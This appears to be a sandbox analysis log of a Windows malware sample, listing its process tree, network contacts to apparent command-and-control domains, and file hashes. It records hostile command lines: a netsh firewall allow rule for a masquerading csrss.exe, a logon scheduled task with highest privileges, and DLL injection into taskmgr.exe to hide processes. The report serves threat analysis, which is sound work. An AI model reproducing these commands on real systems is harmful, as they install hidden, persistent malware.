C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 776
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 904
C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 624
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 880
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3232 -ip 3232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1492
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3232 -ip 3232
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /124-124
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| NL | 185.107.56.197:443 | | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.225:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 184.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.56.107.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 22f921b0-82cb-4918-9889-6d0f36588c5d.ninhaine.com | udp |
| US | 8.8.8.8:53 | server3.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server3.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 104.246.116.51.in-addr.arpa | udp |
Files
C:\Windows\rss\csrss.exe
| MD5 | 5d40fb25ca390d778ae098c7c2b52851 |
| SHA1 | fb16e69f7cce3ca0053a90bbbc107dedebea3352 |
| SHA256 | 7a5cde889fc76d6cd230a74ed658fb446928b69fdeb458be70be7c28f30f81ad |
| SHA512 | 0be767a72d8ee0d4de32209283c6389376a806977e1f1f546eb5ed76720b69c87bb1ed12d667eca53524234de14d529b2cda8e0ddca84d002de162c8fda9ab04 |
C:\Windows\rss\csrss.exe
| MD5 | 83d7c3ddfb73f9444fc1411864043fa1 |
| SHA1 | 6ea0a15bb8ac0a86182d06c91024e0c8d54a1eb2 |
| SHA256 | 4901f67bb729ec47e58a19b5cb0683bcd7c8d073a951eeafd18f37cfb90e8c57 |
| SHA512 | 1fb0307a468ef35d2c37a0557408006cd4945c41f4fe95a1ffecb5ce8e629adf4f85767868d8a12d6da475219142ed932e7157da797a8b079db4923d6fb2d4ee |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |